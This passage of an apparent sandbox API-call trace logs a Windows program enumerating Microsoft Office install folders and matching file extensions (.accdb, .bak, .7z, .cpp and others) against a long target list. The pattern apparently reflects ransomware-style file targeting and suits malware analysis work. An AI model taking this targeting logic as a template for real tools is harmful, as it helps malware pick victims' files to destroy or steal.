ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0294.781] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.781] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0294.786] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.786] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45c38, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sqmapi_x64.dll", cAlternateFileName="SQMAPI~1.DLL")) returned 1 [0294.790] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.790] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn", cAlternateFileName="")) returned 1 [0294.796] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.797] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0294.801] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.801] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0294.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.805] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6cde4ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6cde4ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6cde4ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c2b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.Spatial.NetFX35.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0294.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.811] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x453c2a7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0294.815] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.815] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0294.819] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.819] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4abf9f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0294.990] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.996] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANS", cAlternateFileName="")) returned 1 [0295.023] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.024] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 1 [0295.026] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.026] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 0 [0295.026] FindClose (in: hFindFile=0x3947be8 | out: hFindFile=0x3947be8) returned 1 [0295.026] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0295.026] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x895576a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x895576a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 0 [0295.026] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0295.026] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0295.026] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2283d0f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3688, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSOSEC.DLL", cAlternateFileName="")) returned 1 [0295.029] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0295.029] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Power View Excel Add-in", cAlternateFileName="POWERV~1")) returned 1 [0295.419] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.419] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0295.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.422] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133a7bf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133a7bf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="BI-Report.png", cAlternateFileName="BI-REP~1.PNG")) returned 1 [0295.425] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.425] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0295.430] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.430] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0295.435] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.435] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0295.439] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.439] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0295.446] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.446] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0295.451] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.451] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0295.828] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0295.828] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0295.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu") returned 81 [0295.834] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu") returned 1 [0295.834] lstrlenW (lpString="eu") returned 2 [0295.838] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="eu") returned -1 [0295.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4107f10 [0295.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu") returned 81 [0295.840] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\*", lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3947be8 [0295.856] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0295.856] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7c5d9c5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7c5d9c5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4658, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0295.862] lstrlenW (lpString="AdHocReportingExcelClient.dll") returned 29 [0295.862] lstrlenW (lpString=".1cd") returned 4 [0295.862] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0295.862] lstrlenW (lpString=".3ds") returned 4 [0295.862] lstrcmpiW (lpString1=".3ds", lpString2=".dll") returned -1 [0295.862] lstrlenW (lpString=".3fr") returned 4 [0295.862] lstrcmpiW (lpString1=".3fr", lpString2=".dll") returned -1 [0295.862] lstrlenW (lpString=".3g2") returned 4 [0295.862] lstrcmpiW (lpString1=".3g2", lpString2=".dll") returned -1 [0295.862] lstrlenW (lpString=".3gp") returned 4 [0295.862] lstrcmpiW (lpString1=".3gp", lpString2=".dll") returned -1 [0295.863] lstrlenW (lpString=".7z") returned 3 [0295.863] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0295.863] lstrlenW (lpString=".accda") returned 6 [0295.863] lstrcmpiW (lpString1=".accda", lpString2="nt.dll") returned -1 [0295.863] lstrlenW (lpString=".accdb") returned 6 [0295.863] lstrcmpiW (lpString1=".accdb", lpString2="nt.dll") returned -1 [0295.863] lstrlenW (lpString=".accdc") returned 6 [0295.863] lstrcmpiW (lpString1=".accdc", lpString2="nt.dll") returned -1 [0295.863] lstrlenW (lpString=".accde") returned 6 [0295.863] lstrcmpiW (lpString1=".accde", lpString2="nt.dll") returned -1 [0295.863] lstrlenW (lpString=".accdt") returned 6 [0295.863] lstrcmpiW (lpString1=".accdt", lpString2="nt.dll") returned -1 [0295.863] lstrlenW (lpString=".accdw") returned 6 [0295.863] lstrcmpiW (lpString1=".accdw", lpString2="nt.dll") returned -1 [0295.863] lstrlenW (lpString=".adb") returned 4 [0295.863] lstrcmpiW (lpString1=".adb", lpString2=".dll") returned -1 [0295.863] lstrlenW (lpString=".adp") returned 4 [0295.863] lstrcmpiW (lpString1=".adp", lpString2=".dll") returned -1 [0295.863] lstrlenW (lpString=".ai") returned 3 [0295.863] lstrcmpiW (lpString1=".ai", lpString2="dll") returned -1 [0295.863] lstrlenW (lpString=".ai3") returned 4 [0295.863] lstrcmpiW (lpString1=".ai3", lpString2=".dll") returned -1 [0295.863] lstrlenW (lpString=".ai4") returned 4 [0295.863] lstrcmpiW (lpString1=".ai4", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".ai5") returned 4 [0295.864] lstrcmpiW (lpString1=".ai5", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".ai6") returned 4 [0295.864] lstrcmpiW (lpString1=".ai6", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".ai7") returned 4 [0295.864] lstrcmpiW (lpString1=".ai7", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".ai8") returned 4 [0295.864] lstrcmpiW (lpString1=".ai8", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".anim") returned 5 [0295.864] lstrcmpiW (lpString1=".anim", lpString2="t.dll") returned -1 [0295.864] lstrlenW (lpString=".arw") returned 4 [0295.864] lstrcmpiW (lpString1=".arw", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".as") returned 3 [0295.864] lstrcmpiW (lpString1=".as", lpString2="dll") returned -1 [0295.864] lstrlenW (lpString=".asa") returned 4 [0295.864] lstrcmpiW (lpString1=".asa", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".asc") returned 4 [0295.864] lstrcmpiW (lpString1=".asc", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".ascx") returned 5 [0295.864] lstrcmpiW (lpString1=".ascx", lpString2="t.dll") returned -1 [0295.864] lstrlenW (lpString=".asm") returned 4 [0295.864] lstrcmpiW (lpString1=".asm", lpString2=".dll") returned -1 [0295.864] lstrlenW (lpString=".asmx") returned 5 [0295.864] lstrcmpiW (lpString1=".asmx", lpString2="t.dll") returned -1 [0295.864] lstrlenW (lpString=".asp") returned 4 [0295.865] lstrcmpiW (lpString1=".asp", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".aspx") returned 5 [0295.865] lstrcmpiW (lpString1=".aspx", lpString2="t.dll") returned -1 [0295.865] lstrlenW (lpString=".asr") returned 4 [0295.865] lstrcmpiW (lpString1=".asr", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".asx") returned 4 [0295.865] lstrcmpiW (lpString1=".asx", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".avi") returned 4 [0295.865] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".avs") returned 4 [0295.865] lstrcmpiW (lpString1=".avs", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".backup") returned 7 [0295.865] lstrcmpiW (lpString1=".backup", lpString2="ent.dll") returned -1 [0295.865] lstrlenW (lpString=".bak") returned 4 [0295.865] lstrcmpiW (lpString1=".bak", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".bay") returned 4 [0295.865] lstrcmpiW (lpString1=".bay", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".bd") returned 3 [0295.865] lstrcmpiW (lpString1=".bd", lpString2="dll") returned -1 [0295.865] lstrlenW (lpString=".bin") returned 4 [0295.865] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".bmp") returned 4 [0295.865] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".bz2") returned 4 [0295.865] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0295.865] lstrlenW (lpString=".c") returned 2 [0295.866] lstrcmpiW (lpString1=".c", lpString2="ll") returned -1 [0295.866] lstrlenW (lpString=".cdr") returned 4 [0295.866] lstrcmpiW (lpString1=".cdr", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".cer") returned 4 [0295.866] lstrcmpiW (lpString1=".cer", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".cf") returned 3 [0295.866] lstrcmpiW (lpString1=".cf", lpString2="dll") returned -1 [0295.866] lstrlenW (lpString=".cfc") returned 4 [0295.866] lstrcmpiW (lpString1=".cfc", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".cfm") returned 4 [0295.866] lstrcmpiW (lpString1=".cfm", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".cfml") returned 5 [0295.866] lstrcmpiW (lpString1=".cfml", lpString2="t.dll") returned -1 [0295.866] lstrlenW (lpString=".cfu") returned 4 [0295.866] lstrcmpiW (lpString1=".cfu", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".chm") returned 4 [0295.866] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".cin") returned 4 [0295.866] lstrcmpiW (lpString1=".cin", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".class") returned 6 [0295.866] lstrcmpiW (lpString1=".class", lpString2="nt.dll") returned -1 [0295.866] lstrlenW (lpString=".clx") returned 4 [0295.866] lstrcmpiW (lpString1=".clx", lpString2=".dll") returned -1 [0295.866] lstrlenW (lpString=".config") returned 7 [0295.866] lstrcmpiW (lpString1=".config", lpString2="ent.dll") returned -1 [0295.867] lstrlenW (lpString=".cpp") returned 4 [0295.867] lstrcmpiW (lpString1=".cpp", lpString2=".dll") returned -1 [0295.867] lstrlenW (lpString=".cr2") returned 4 [0295.867] lstrcmpiW (lpString1=".cr2", lpString2=".dll") returned -1 [0295.867] lstrlenW (lpString=".crt") returned 4 [0295.867] lstrcmpiW (lpString1=".crt", lpString2=".dll") returned -1 [0295.867] lstrlenW (lpString=".crw") returned 4 [0295.867] lstrcmpiW (lpString1=".crw", lpString2=".dll") returned -1 [0295.867] lstrlenW (lpString=".cs") returned 3 [0295.867] lstrcmpiW (lpString1=".cs", lpString2="dll") returned -1 [0295.867] lstrlenW (lpString=".css") returned 4 [0295.867] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0295.867] lstrlenW (lpString=".csv") returned 4 [0295.867] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0295.867] lstrlenW (lpString=".cub") returned 4 [0295.868] lstrcmpiW (lpString1=".cub", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".dae") returned 4 [0295.868] 